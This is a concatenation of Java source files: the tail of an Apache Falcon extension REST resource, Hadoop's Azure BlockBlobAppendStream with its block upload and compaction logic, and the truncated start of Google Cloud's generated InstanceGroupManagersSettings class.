extensionBean.getExtensionType(); String extensionResourcePath; if (ExtensionType.TRUSTED.equals(extensionType)) { extensionResourcePath = extensionBean.getLocation() + "/META/" + extensionName.toLowerCase() + EXTENSION_PROPERTY_JSON_SUFFIX; } else { extensionResourcePath = extensionBean.getLocation() + "/META"; } return new APIResult(APIResult.Status.SUCCEEDED, ExtensionStore.get().getResource(extensionResourcePath)); } catch (FalconException e) { throw FalconWebException.newAPIException(e, Response.Status.BAD_REQUEST); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @POST @Path("disable/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_PLAIN, MediaType.TEXT_XML}) public APIResult disableExtension( @PathParam("extension-name") String extensionName) { checkIfExtensionServiceIsEnabled(); try { return new APIResult(APIResult.Status.SUCCEEDED, super.disableExtension(extensionName, CurrentUser.getUser())); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @POST @Path("enable/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_PLAIN, MediaType.TEXT_XML}) public APIResult enableExtension( @PathParam("extension-name") String extensionName) { checkIfExtensionServiceIsEnabled(); try { return new APIResult(APIResult.Status.SUCCEEDED, super.enableExtension(extensionName, CurrentUser.getUser())); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } private static void checkIfExtensionServiceIsEnabled() { if (!Services.get().isRegistered(ExtensionService.SERVICE_NAME)) { LOG.error(ExtensionService.SERVICE_NAME + " is not enabled."); throw FalconWebException.newAPIException( ExtensionService.SERVICE_NAME + " is not enabled.", Response.Status.NOT_FOUND); } } }
apache/hadoop
35,789
hadoop-tools/hadoop-azure/src/main/java/org/apache/hadoop/fs/azure/BlockBlobAppendStream.java
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.fs.azure; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.OutputStream; import java.nio.ByteBuffer; import java.nio.charset.StandardCharsets; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.UUID; import java.util.Random; import java.util.concurrent.ConcurrentLinkedDeque; import java.util.concurrent.ConcurrentLinkedQueue; import java.util.concurrent.CountDownLatch; import java.util.concurrent.LinkedBlockingQueue; import java.util.concurrent.Semaphore; import java.util.concurrent.ThreadFactory; import java.util.concurrent.ThreadPoolExecutor; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicInteger; import java.util.concurrent.atomic.AtomicLong; import java.util.concurrent.atomic.AtomicReference; import org.apache.hadoop.fs.impl.StoreImplementationUtils; import org.apache.hadoop.classification.VisibleForTesting; import org.apache.hadoop.util.Preconditions; import org.apache.commons.lang3.StringUtils; import org.apache.hadoop.fs.FSExceptionMessages; import org.apache.commons.codec.binary.Base64; import org.apache.hadoop.fs.StreamCapabilities; import org.apache.hadoop.fs.Syncable; import org.apache.hadoop.fs.azure.StorageInterface.CloudBlockBlobWrapper; import org.apache.hadoop.io.ElasticByteBufferPool; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import com.microsoft.azure.storage.AccessCondition; import com.microsoft.azure.storage.OperationContext; import com.microsoft.azure.storage.StorageException; import com.microsoft.azure.storage.StorageErrorCodeStrings; import com.microsoft.azure.storage.blob.BlobRequestOptions; import com.microsoft.azure.storage.blob.BlockEntry; import com.microsoft.azure.storage.blob.BlockListingFilter; import com.microsoft.azure.storage.blob.BlockSearchMode; /** * Stream object that implements append for Block Blobs in WASB. * * The stream object implements hflush/hsync and block compaction. Block * compaction is the process of replacing a sequence of small blocks with one * big block. Azure Block blobs supports up to 50000 blocks and every * hflush/hsync generates one block. When the number of blocks is above 32000, * the process of compaction decreases the total number of blocks, if possible. * If compaction is disabled, hflush/hsync are empty functions. * * The stream object uses background threads for uploading the blocks and the * block blob list. Blocks can be uploaded concurrently. However, when the block * list is uploaded, block uploading should stop. If a block is uploaded before * the block list and the block id is not in the list, the block will be lost. * If the block is uploaded after the block list and the block id is in the * list, the block list upload will fail. The exclusive access for the block * list upload is managed by uploadingSemaphore. */ public class BlockBlobAppendStream extends OutputStream implements Syncable, StreamCapabilities { /** * The name of the blob/file. */ private final String key; /** * This variable tracks if this is new blob or existing one. */ private boolean blobExist; /** * When the blob exist, to to prevent concurrent write we take a lease. * Taking a lease is not necessary for new blobs. */ private SelfRenewingLease lease = null; /** * The support for process of compaction is optional. */ private final boolean compactionEnabled; /** * The number of blocks above each block compaction is triggered. */ private static final int DEFAULT_ACTIVATE_COMPACTION_BLOCK_COUNT = 32000; /** * The number of blocks above each block compaction is triggered. */ private int activateCompactionBlockCount = DEFAULT_ACTIVATE_COMPACTION_BLOCK_COUNT; /** * The size of the output buffer. Writes store the data in outBuffer until * either the size is above maxBlockSize or hflush/hsync is called. */ private final AtomicInteger maxBlockSize; /** * The current buffer where writes are stored. */ private ByteBuffer outBuffer; /** * The size of the blob that has been successfully stored in the Azure Blob * service. */ private final AtomicLong committedBlobLength = new AtomicLong(0); /** * Position of last block in the blob. */ private volatile long blobLength = 0; /** * Minutes waiting before the close operation timed out. */ private static final int CLOSE_UPLOAD_DELAY = 10; /** * Keep alive time for the threadpool. */ private static final int THREADPOOL_KEEP_ALIVE = 30; /** * Azure Block Blob used for the stream. */ private final CloudBlockBlobWrapper blob; /** * Azure Storage operation context. */ private final OperationContext opContext; /** * Commands send from client calls to the background thread pool. */ private abstract class UploadCommand { // the blob offset for the command private final long commandBlobOffset; // command completion latch private final CountDownLatch completed = new CountDownLatch(1); UploadCommand(long offset) { this.commandBlobOffset = offset; } long getCommandBlobOffset() { return commandBlobOffset; } void await() throws InterruptedException { completed.await(); } void awaitAsDependent() throws InterruptedException { await(); } void setCompleted() { completed.countDown(); } void execute() throws InterruptedException, IOException {} void dump() {} } /** * The list of recent commands. Before block list is committed, all the block * listed in the list must be uploaded. activeBlockCommands is used for * enumerating the blocks and waiting on the latch until the block is * uploaded. */ private final ConcurrentLinkedQueue<UploadCommand> activeBlockCommands = new ConcurrentLinkedQueue<>(); /** * Variable to track if the stream has been closed. */ private volatile boolean closed = false; /** * First IOException encountered. */ private final AtomicReference<IOException> firstError = new AtomicReference<>(); /** * Flag set when the first error has been thrown. */ private boolean firstErrorThrown = false; /** * Semaphore for serializing block uploads with NativeAzureFileSystem. * * The semaphore starts with number of permits equal to the number of block * upload threads. Each block upload thread needs one permit to start the * upload. The put block list acquires all the permits before the block list * is committed. */ private final Semaphore uploadingSemaphore = new Semaphore( MAX_NUMBER_THREADS_IN_THREAD_POOL, true); /** * Queue storing buffers with the size of the Azure block ready for * reuse. The pool allows reusing the blocks instead of allocating new * blocks. After the data is sent to the service, the buffer is returned * back to the queue */ private final ElasticByteBufferPool poolReadyByteBuffers = new ElasticByteBufferPool(); /** * The blob's block list. */ private final List<BlockEntry> blockEntries = new ArrayList<>( DEFAULT_CAPACITY_BLOCK_ENTRIES); private static final int DEFAULT_CAPACITY_BLOCK_ENTRIES = 1024; /** * The uncommitted blob's block list. */ private final ConcurrentLinkedDeque<BlockEntry> uncommittedBlockEntries = new ConcurrentLinkedDeque<>(); /** * Variable to hold the next block id to be used for azure storage blocks. */ private static final int UNSET_BLOCKS_COUNT = -1; private long nextBlockCount = UNSET_BLOCKS_COUNT; /** * Variable to hold the block id prefix to be used for azure storage blocks. */ private String blockIdPrefix = null; /** * Maximum number of threads in block upload thread pool. */ private static final int MAX_NUMBER_THREADS_IN_THREAD_POOL = 4; /** * Number of times block upload needs is retried. */ private static final int MAX_BLOCK_UPLOAD_RETRIES = 3; /** * Wait time between block upload retries in milliseconds. */ private static final int BLOCK_UPLOAD_RETRY_INTERVAL = 1000; /** * Logger. */ private static final Logger LOG = LoggerFactory.getLogger(BlockBlobAppendStream.class); /** * The absolute maximum of blocks for a blob. It includes committed and * temporary blocks. */ private static final int MAX_BLOCK_COUNT = 100000; /** * The upload thread pool executor. */ private ThreadPoolExecutor ioThreadPool; /** * Azure Storage access conditions for the blob. */ private final AccessCondition accessCondition = new AccessCondition(); /** * Atomic integer to provide thread id for thread names for uploader threads. */ private final AtomicInteger threadSequenceNumber; /** * Prefix to be used for thread names for uploader threads. */ private static final String THREAD_ID_PREFIX = "append-blockblob"; /** * BlockBlobAppendStream constructor. * * @param blob * Azure Block Blob * @param aKey * blob's name * @param bufferSize * the maximum size of a blob block. * @param compactionEnabled * is the compaction process enabled for this blob * @param opContext * Azure Store operation context for the blob * @throws IOException * if an I/O error occurs. In particular, an IOException may be * thrown if the output stream cannot be used for append operations */ public BlockBlobAppendStream(final CloudBlockBlobWrapper blob, final String aKey, final int bufferSize, final boolean compactionEnabled, final OperationContext opContext) throws IOException { Preconditions.checkArgument(StringUtils.isNotEmpty(aKey)); Preconditions.checkArgument(bufferSize >= 0); this.blob = blob; this.opContext = opContext; this.key = aKey; this.maxBlockSize = new AtomicInteger(bufferSize); this.threadSequenceNumber = new AtomicInteger(0); this.blockIdPrefix = null; this.compactionEnabled = compactionEnabled; this.blobExist = true; this.outBuffer = poolReadyByteBuffers.getBuffer(false, maxBlockSize.get()); try { // download the block list blockEntries.addAll( blob.downloadBlockList( BlockListingFilter.COMMITTED, new BlobRequestOptions(), opContext)); blobLength = blob.getProperties().getLength(); committedBlobLength.set(blobLength); // Acquiring lease on the blob. lease = new SelfRenewingLease(blob, true); accessCondition.setLeaseID(lease.getLeaseID()); } catch (StorageException ex) { if (ex.getErrorCode().equals(StorageErrorCodeStrings.BLOB_NOT_FOUND)) { blobExist = false; } else if (ex.getErrorCode().equals( StorageErrorCodeStrings.LEASE_ALREADY_PRESENT)) { throw new AzureException( "Unable to set Append lease on the Blob: " + ex, ex); } else { LOG.debug( "Encountered storage exception." + " StorageException : {} ErrorCode : {}", ex, ex.getErrorCode()); throw new AzureException(ex); } } setBlocksCountAndBlockIdPrefix(blockEntries); this.ioThreadPool = new ThreadPoolExecutor( MAX_NUMBER_THREADS_IN_THREAD_POOL, MAX_NUMBER_THREADS_IN_THREAD_POOL, THREADPOOL_KEEP_ALIVE, TimeUnit.SECONDS, new LinkedBlockingQueue<>(), new UploaderThreadFactory()); } /** * Set payload size of the stream. * It is intended to be used for unit testing purposes only. */ @VisibleForTesting synchronized void setMaxBlockSize(int size) { maxBlockSize.set(size); // it is for testing only so we can abandon the previously allocated // payload this.outBuffer = ByteBuffer.allocate(maxBlockSize.get()); } /** * Set compaction parameters. * It is intended to be used for unit testing purposes only. */ @VisibleForTesting void setCompactionBlockCount(int activationCount) { activateCompactionBlockCount = activationCount; } /** * Get the list of block entries. It is used for testing purposes only. * @return List of block entries. */ @VisibleForTesting List<BlockEntry> getBlockList() throws StorageException, IOException { return blob.downloadBlockList( BlockListingFilter.COMMITTED, new BlobRequestOptions(), opContext); } /** * Writes the specified byte to this output stream. The general contract for * write is that one byte is written to the output stream. The byte to be * written is the eight low-order bits of the argument b. The 24 high-order * bits of b are ignored. * * @param byteVal * the byteValue to write. * @throws IOException * if an I/O error occurs. In particular, an IOException may be * thrown if the output stream has been closed. */ @Override public void write(final int byteVal) throws IOException { write(new byte[] { (byte) (byteVal & 0xFF) }); } /** * Writes length bytes from the specified byte array starting at offset to * this output stream. * * @param data * the byte array to write. * @param offset * the start offset in the data. * @param length * the number of bytes to write. * @throws IOException * if an I/O error occurs. In particular, an IOException may be * thrown if the output stream has been closed. */ @Override public synchronized void write(final byte[] data, int offset, int length) throws IOException { Preconditions.checkArgument(data != null, "null data"); if (offset < 0 || length < 0 || length > data.length - offset) { throw new IndexOutOfBoundsException(); } if (closed) { throw new IOException(FSExceptionMessages.STREAM_IS_CLOSED); } while (outBuffer.remaining() < length) { int remaining = outBuffer.remaining(); outBuffer.put(data, offset, remaining); // upload payload to azure storage addBlockUploadCommand(); offset += remaining; length -= remaining; } outBuffer.put(data, offset, length); } /** * Flushes this output stream and forces any buffered output bytes to be * written out. If any data remains in the payload it is committed to the * service. Data is queued for writing and forced out to the service * before the call returns. */ @Override public void flush() throws IOException { if (closed) { // calling close() after the stream is closed starts with call to flush() return; } addBlockUploadCommand(); if (committedBlobLength.get() < blobLength) { try { // wait until the block list is committed addFlushCommand().await(); } catch (InterruptedException ie) { Thread.currentThread().interrupt(); } } } /** * Force all data in the output stream to be written to Azure storage. * Wait to return until this is complete. */ @Override public void hsync() throws IOException { // when block compaction is disabled, hsync is empty function if (compactionEnabled) { flush(); } } /** * Force all data in the output stream to be written to Azure storage. * Wait to return until this is complete. */ @Override public void hflush() throws IOException { // when block compaction is disabled, hflush is empty function if (compactionEnabled) { flush(); } } /** * The Synchronization capabilities of this stream depend upon the compaction * policy. * @param capability string to query the stream support for. * @return true for hsync and hflush when compaction is enabled. */ @Override public boolean hasCapability(String capability) { if (!compactionEnabled) { return false; } return StoreImplementationUtils.isProbeForSyncable(capability); } /** * Force all data in the output stream to be written to Azure storage. * Wait to return until this is complete. Close the access to the stream and * shutdown the upload thread pool. * If the blob was created, its lease will be released. * Any error encountered caught in threads and stored will be rethrown here * after cleanup. */ @Override public synchronized void close() throws IOException { LOG.debug("close {} ", key); if (closed) { return; } // Upload the last block regardless of compactionEnabled flag flush(); // Initiates an orderly shutdown in which previously submitted tasks are // executed. ioThreadPool.shutdown(); try { // wait up to CLOSE_UPLOAD_DELAY minutes to upload all the blocks if (!ioThreadPool.awaitTermination(CLOSE_UPLOAD_DELAY, TimeUnit.MINUTES)) { LOG.error("Time out occurred while close() is waiting for IO request to" + " finish in append" + " for blob : {}", key); NativeAzureFileSystemHelper.logAllLiveStackTraces(); throw new AzureException("Timed out waiting for IO requests to finish"); } } catch(InterruptedException ex) { Thread.currentThread().interrupt(); } // release the lease if (firstError.get() == null && blobExist) { try { lease.free(); } catch (StorageException ex) { LOG.debug("Lease free update blob {} encountered Storage Exception:" + " {} Error Code : {}", key, ex, ex.getErrorCode()); maybeSetFirstError(new AzureException(ex)); } } closed = true; // finally, throw the first exception raised if it has not // been thrown elsewhere. if (firstError.get() != null && !firstErrorThrown) { throw firstError.get(); } } /** * Helper method used to generate the blockIDs. The algorithm used is similar * to the Azure storage SDK. */ private void setBlocksCountAndBlockIdPrefix(List<BlockEntry> blockEntries) { if (nextBlockCount == UNSET_BLOCKS_COUNT && blockIdPrefix == null) { Random sequenceGenerator = new Random(); String blockZeroBlockId = (!blockEntries.isEmpty()) ? blockEntries.get(0).getId() : ""; String prefix = UUID.randomUUID().toString() + "-"; String sampleNewerVersionBlockId = generateNewerVersionBlockId(prefix, 0); if (!blockEntries.isEmpty() && blockZeroBlockId.length() < sampleNewerVersionBlockId.length()) { // If blob has already been created with 2.2.0, append subsequent blocks // with older version (2.2.0) blockId compute nextBlockCount, the way it // was done before; and don't use blockIdPrefix this.blockIdPrefix = ""; nextBlockCount = (long) (sequenceGenerator.nextInt(Integer.MAX_VALUE)) + sequenceGenerator.nextInt( Integer.MAX_VALUE - MAX_BLOCK_COUNT); nextBlockCount += blockEntries.size(); } else { // If there are no existing blocks, create the first block with newer // version (4.2.0) blockId. If blob has already been created with 4.2.0, // append subsequent blocks with newer version (4.2.0) blockId this.blockIdPrefix = prefix; nextBlockCount = blockEntries.size(); } } } /** * Helper method that generates the next block id for uploading a block to * azure storage. * @return String representing the block ID generated. * @throws IOException if the stream is in invalid state */ private String generateBlockId() throws IOException { if (nextBlockCount == UNSET_BLOCKS_COUNT || blockIdPrefix == null) { throw new AzureException( "Append Stream in invalid state. nextBlockCount not set correctly"); } return (!blockIdPrefix.isEmpty()) ? generateNewerVersionBlockId(blockIdPrefix, nextBlockCount++) : generateOlderVersionBlockId(nextBlockCount++); } /** * Helper method that generates an older (2.2.0) version blockId. * @return String representing the block ID generated. */ private String generateOlderVersionBlockId(long id) { byte[] blockIdInBytes = new byte[8]; for (int m = 0; m < 8; m++) { blockIdInBytes[7 - m] = (byte) ((id >> (8 * m)) & 0xFF); } return new String( Base64.encodeBase64(blockIdInBytes), StandardCharsets.UTF_8); } /** * Helper method that generates an newer (4.2.0) version blockId. * @return String representing the block ID generated. */ private String generateNewerVersionBlockId(String prefix, long id) { String blockIdSuffix = String.format("%06d", id); byte[] blockIdInBytes = (prefix + blockIdSuffix).getBytes(StandardCharsets.UTF_8); return new String(Base64.encodeBase64(blockIdInBytes), StandardCharsets.UTF_8); } /** * This is shared between upload block Runnable and CommitBlockList. The * method captures retry logic * @param blockId block name * @param dataPayload block content */ private void writeBlockRequestInternal(String blockId, ByteBuffer dataPayload, boolean bufferPoolBuffer) { IOException lastLocalException = null; int uploadRetryAttempts = 0; while (uploadRetryAttempts < MAX_BLOCK_UPLOAD_RETRIES) { try { long startTime = System.nanoTime(); blob.uploadBlock(blockId, accessCondition, new ByteArrayInputStream( dataPayload.array()), dataPayload.position(), new BlobRequestOptions(), opContext); LOG.debug("upload block finished for {} ms. block {} ", TimeUnit.NANOSECONDS.toMillis( System.nanoTime() - startTime), blockId); break; } catch(Exception ioe) { LOG.debug("Encountered exception during uploading block for Blob {}" + " Exception : {}", key, ioe); uploadRetryAttempts++; lastLocalException = new AzureException( "Encountered Exception while uploading block: " + ioe, ioe); try { Thread.sleep( BLOCK_UPLOAD_RETRY_INTERVAL * (uploadRetryAttempts + 1)); } catch(InterruptedException ie) { Thread.currentThread().interrupt(); break; } } } if (bufferPoolBuffer) { poolReadyByteBuffers.putBuffer(dataPayload); } if (uploadRetryAttempts == MAX_BLOCK_UPLOAD_RETRIES) { maybeSetFirstError(lastLocalException); } } /** * Set {@link #firstError} to the exception if it is not already set. * @param exception exception to save */ private void maybeSetFirstError(IOException exception) { firstError.compareAndSet(null, exception); } /** * Throw the first error caught if it has not been raised already * @throws IOException if one is caught and needs to be thrown. */ private void maybeThrowFirstError() throws IOException { if (firstError.get() != null) { firstErrorThrown = true; throw firstError.get(); } } /** * Write block list. The method captures retry logic */ private void writeBlockListRequestInternal() { IOException lastLocalException = null; int uploadRetryAttempts = 0; while (uploadRetryAttempts < MAX_BLOCK_UPLOAD_RETRIES) { try { long startTime = System.nanoTime(); blob.commitBlockList(blockEntries, accessCondition, new BlobRequestOptions(), opContext); LOG.debug("Upload block list took {} ms for blob {} ", TimeUnit.NANOSECONDS.toMillis( System.nanoTime() - startTime), key); break; } catch(Exception ioe) { LOG.debug("Encountered exception during uploading block for Blob {}" + " Exception : {}", key, ioe); uploadRetryAttempts++; lastLocalException = new AzureException( "Encountered Exception while uploading block: " + ioe, ioe); try { Thread.sleep( BLOCK_UPLOAD_RETRY_INTERVAL * (uploadRetryAttempts + 1)); } catch(InterruptedException ie) { Thread.currentThread().interrupt(); break; } } } if (uploadRetryAttempts == MAX_BLOCK_UPLOAD_RETRIES) { maybeSetFirstError(lastLocalException); } } /** * A ThreadFactory that creates uploader thread with * meaningful names helpful for debugging purposes. */ class UploaderThreadFactory implements ThreadFactory { @Override public Thread newThread(Runnable r) { Thread t = new Thread(r); t.setName(String.format("%s-%d", THREAD_ID_PREFIX, threadSequenceNumber.getAndIncrement())); return t; } } /** * Upload block commands. */ private class UploadBlockCommand extends UploadCommand { // the block content for upload private final ByteBuffer payload; // description of the block private final BlockEntry entry; UploadBlockCommand(String blockId, ByteBuffer payload) { super(blobLength); BlockEntry blockEntry = new BlockEntry(blockId); blockEntry.setSize(payload.position()); blockEntry.setSearchMode(BlockSearchMode.LATEST); this.payload = payload; this.entry = blockEntry; uncommittedBlockEntries.add(blockEntry); } /** * Execute command. */ void execute() throws InterruptedException { uploadingSemaphore.acquire(1); writeBlockRequestInternal(entry.getId(), payload, true); uploadingSemaphore.release(1); } void dump() { LOG.debug("upload block {} size: {} for blob {}", entry.getId(), entry.getSize(), key); } } /** * Upload blob block list commands. */ private class UploadBlockListCommand extends UploadCommand { private BlockEntry lastBlock = null; UploadBlockListCommand() { super(blobLength); if (!uncommittedBlockEntries.isEmpty()) { lastBlock = uncommittedBlockEntries.getLast(); } } void awaitAsDependent() throws InterruptedException { // empty. later commit block does not need to wait previous commit block // lists. } void dump() { LOG.debug("commit block list with {} blocks for blob {}", uncommittedBlockEntries.size(), key); } /** * Execute command. */ public void execute() throws InterruptedException, IOException { if (committedBlobLength.get() >= getCommandBlobOffset()) { LOG.debug("commit already applied for {}", key); return; } if (lastBlock == null) { LOG.debug("nothing to commit for {}", key); return; } LOG.debug("active commands: {} for {}", activeBlockCommands.size(), key); for (UploadCommand activeCommand : activeBlockCommands) { if (activeCommand.getCommandBlobOffset() < getCommandBlobOffset()) { activeCommand.dump(); activeCommand.awaitAsDependent(); } else { break; } } // stop all uploads until the block list is committed uploadingSemaphore.acquire(MAX_NUMBER_THREADS_IN_THREAD_POOL); BlockEntry uncommittedBlock; do { uncommittedBlock = uncommittedBlockEntries.poll(); blockEntries.add(uncommittedBlock); } while (uncommittedBlock != lastBlock); if (blockEntries.size() > activateCompactionBlockCount) { LOG.debug("Block compaction: activated with {} blocks for {}", blockEntries.size(), key); // Block compaction long startCompaction = System.nanoTime(); blockCompaction(); LOG.debug("Block compaction finished for {} ms with {} blocks for {}", TimeUnit.NANOSECONDS.toMillis( System.nanoTime() - startCompaction), blockEntries.size(), key); } writeBlockListRequestInternal(); uploadingSemaphore.release(MAX_NUMBER_THREADS_IN_THREAD_POOL); // remove blocks previous commands for (Iterator<UploadCommand> it = activeBlockCommands.iterator(); it.hasNext();) { UploadCommand activeCommand = it.next(); if (activeCommand.getCommandBlobOffset() <= getCommandBlobOffset()) { it.remove(); } else { break; } } committedBlobLength.set(getCommandBlobOffset()); } /** * Internal output stream with read access to the internal buffer. */ private class ByteArrayOutputStreamInternal extends ByteArrayOutputStream { ByteArrayOutputStreamInternal(int size) { super(size); } byte[] getByteArray() { return buf; } } /** * Block compaction process. * * Block compaction is only enabled when the number of blocks exceeds * activateCompactionBlockCount. The algorithm searches for the longest * segment [b..e) where (e-b) > 2 && |b| + |b+1| ... |e-1| < maxBlockSize * such that size(b1) + size(b2) + ... + size(bn) < maximum-block-size. * It then downloads the blocks in the sequence, concatenates the data to * form a single block, uploads this new block, and updates the block * list to replace the sequence of blocks with the new block. */ private void blockCompaction() throws IOException { //current segment [segmentBegin, segmentEnd) and file offset/size of the // current segment int segmentBegin = 0, segmentEnd = 0; long segmentOffsetBegin = 0, segmentOffsetEnd = 0; //longest segment [maxSegmentBegin, maxSegmentEnd) and file offset/size of // the longest segment int maxSegmentBegin = 0, maxSegmentEnd = 0; long maxSegmentOffsetBegin = 0, maxSegmentOffsetEnd = 0; for (BlockEntry block : blockEntries) { segmentEnd++; segmentOffsetEnd += block.getSize(); if (segmentOffsetEnd - segmentOffsetBegin > maxBlockSize.get()) { if (segmentEnd - segmentBegin > 2) { if (maxSegmentEnd - maxSegmentBegin < segmentEnd - segmentBegin) { maxSegmentBegin = segmentBegin; maxSegmentEnd = segmentEnd; maxSegmentOffsetBegin = segmentOffsetBegin; maxSegmentOffsetEnd = segmentOffsetEnd - block.getSize(); } } segmentBegin = segmentEnd - 1; segmentOffsetBegin = segmentOffsetEnd - block.getSize(); } } if (maxSegmentEnd - maxSegmentBegin > 1) { LOG.debug("Block compaction: {} blocks for {}", maxSegmentEnd - maxSegmentBegin, key); // download synchronously all the blocks from the azure storage ByteArrayOutputStreamInternal blockOutputStream = new ByteArrayOutputStreamInternal(maxBlockSize.get()); try { long length = maxSegmentOffsetEnd - maxSegmentOffsetBegin; blob.downloadRange(maxSegmentOffsetBegin, length, blockOutputStream, new BlobRequestOptions(), opContext); } catch(StorageException ex) { LOG.error( "Storage exception encountered during block compaction phase" + " : {} Storage Exception : {} Error Code: {}", key, ex, ex.getErrorCode()); throw new AzureException( "Encountered Exception while committing append blocks " + ex, ex); } // upload synchronously new block to the azure storage String blockId = generateBlockId(); ByteBuffer byteBuffer = ByteBuffer.wrap( blockOutputStream.getByteArray()); byteBuffer.position(blockOutputStream.size()); writeBlockRequestInternal(blockId, byteBuffer, false); // replace blocks from the longest segment with new block id blockEntries.subList(maxSegmentBegin + 1, maxSegmentEnd - 1).clear(); BlockEntry newBlock = blockEntries.get(maxSegmentBegin); newBlock.setId(blockId); newBlock.setSearchMode(BlockSearchMode.LATEST); newBlock.setSize(maxSegmentOffsetEnd - maxSegmentOffsetBegin); } } } /** * Prepare block upload command and queue the command in thread pool executor. */ private synchronized void addBlockUploadCommand() throws IOException { maybeThrowFirstError(); if (blobExist && lease.isFreed()) { throw new AzureException(String.format( "Attempting to upload a block on blob : %s " + " that does not have lease on the Blob. Failing upload", key)); } int blockSize = outBuffer.position(); if (blockSize > 0) { UploadCommand command = new UploadBlockCommand(generateBlockId(), outBuffer); activeBlockCommands.add(command); blobLength += blockSize; outBuffer = poolReadyByteBuffers.getBuffer(false, maxBlockSize.get()); ioThreadPool.execute(new WriteRequest(command)); } } /** * Prepare block list commit command and queue the command in thread pool * executor. */ private synchronized UploadCommand addFlushCommand() throws IOException { maybeThrowFirstError(); if (blobExist && lease.isFreed()) { throw new AzureException( String.format("Attempting to upload block list on blob : %s" + " that does not have lease on the Blob. Failing upload", key)); } UploadCommand command = new UploadBlockListCommand(); activeBlockCommands.add(command); ioThreadPool.execute(new WriteRequest(command)); return command; } /** * Runnable instance that uploads the block of data to azure storage. */ private class WriteRequest implements Runnable { private final UploadCommand command; WriteRequest(UploadCommand command) { this.command = command; } @Override public void run() { try { command.dump(); long startTime = System.nanoTime(); command.execute(); command.setCompleted(); LOG.debug("command finished for {} ms", TimeUnit.NANOSECONDS.toMillis( System.nanoTime() - startTime)); } catch (InterruptedException ie) { Thread.currentThread().interrupt(); } catch (Exception ex) { LOG.debug( "Encountered exception during execution of command for Blob :" + " {} Exception : {}", key, ex); firstError.compareAndSet(null, new AzureException(ex)); } } } }
googleapis/google-cloud-java
36,200
java-compute/google-cloud-compute/src/main/java/com/google/cloud/compute/v1/InstanceGroupManagersSettings.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.cloud.compute.v1; import static com.google.cloud.compute.v1.InstanceGroupManagersClient.AggregatedListPagedResponse; import static com.google.cloud.compute.v1.InstanceGroupManagersClient.ListErrorsPagedResponse; import static com.google.cloud.compute.v1.InstanceGroupManagersClient.ListManagedInstancesPagedResponse; import static com.google.cloud.compute.v1.InstanceGroupManagersClient.ListPagedResponse; import static com.google.cloud.compute.v1.InstanceGroupManagersClient.ListPerInstanceConfigsPagedResponse; import com.google.api.core.ApiFunction; import com.google.api.gax.core.GoogleCredentialsProvider; import com.google.api.gax.core.InstantiatingExecutorProvider; import com.google.api.gax.httpjson.InstantiatingHttpJsonChannelProvider; import com.google.api.gax.rpc.ApiClientHeaderProvider; import com.google.api.gax.rpc.ClientContext; import com.google.api.gax.rpc.ClientSettings; import com.google.api.gax.rpc.OperationCallSettings; import com.google.api.gax.rpc.PagedCallSettings; import com.google.api.gax.rpc.TransportChannelProvider; import com.google.api.gax.rpc.UnaryCallSettings; import com.google.cloud.compute.v1.stub.InstanceGroupManagersStubSettings; import java.io.IOException; import java.util.List; import javax.annotation.Generated; // AUTO-GENERATED DOCUMENTATION AND CLASS. /** * Settings class to configure an instance of {@link InstanceGroupManagersClient}. * * <p>The default instance has everything set to sensible defaults: * * <ul> * <li>The default service address (compute.googleapis.com) and default port (443) are used. * <li>Credentials are acquired automatically through Application Default Credentials. * <li>Retries are configured for idempotent methods but not for non-idempotent methods. * </ul> * * <p>The builder of this class is recursive, so contained classes are themselves builders. When * build() is called, the tree of builders is called to create the complete settings object. * * <p>For example, to set the * [RetrySettings](https://cloud.google.com/java/docs/reference/gax/latest/com.google.api.gax.retrying.RetrySettings) * of get: * * <pre>{@code * // This snippet has been automatically generated and should be regarded as a code template only. * // It will require modifications to work: * // - It may require correct/in-range values for request initialization. * // - It may require specifying regional endpoints when creating the service client as shown in * // https://cloud.google.com/java/docs/setup#configure_endpoints_for_the_client_library * InstanceGroupManagersSettings.Builder instanceGroupManagersSettingsBuilder = * InstanceGroupManagersSettings.newBuilder(); * instanceGroupManagersSettingsBuilder * .getSettings() * .setRetrySettings( * instanceGroupManagersSettingsBuilder * .getSettings() * .getRetrySettings() * .toBuilder() * .setInitialRetryDelayDuration(Duration.ofSeconds(1)) * .setInitialRpcTimeoutDuration(Duration.ofSeconds(5)) * .setMaxAttempts(5) * .setMaxRetryDelayDuration(Duration.ofSeconds(30)) * .setMaxRpcTimeoutDuration(Duration.ofSeconds(60)) * .setRetryDelayMultiplier(1.3) * .setRpcTimeoutMultiplier(1.5) * .setTotalTimeoutDuration(Duration.ofSeconds(300)) * .build()); * InstanceGroupManagersSettings instanceGroupManagersSettings = * instanceGroupManagersSettingsBuilder.build(); * }</pre> * * Please refer to the [Client Side Retry * Guide](https://github.com/googleapis/google-cloud-java/blob/main/docs/client_retries.md) for * additional support in setting retries. * * <p>To configure the RetrySettings of a Long Running Operation method, create an * OperationTimedPollAlgorithm object and update the 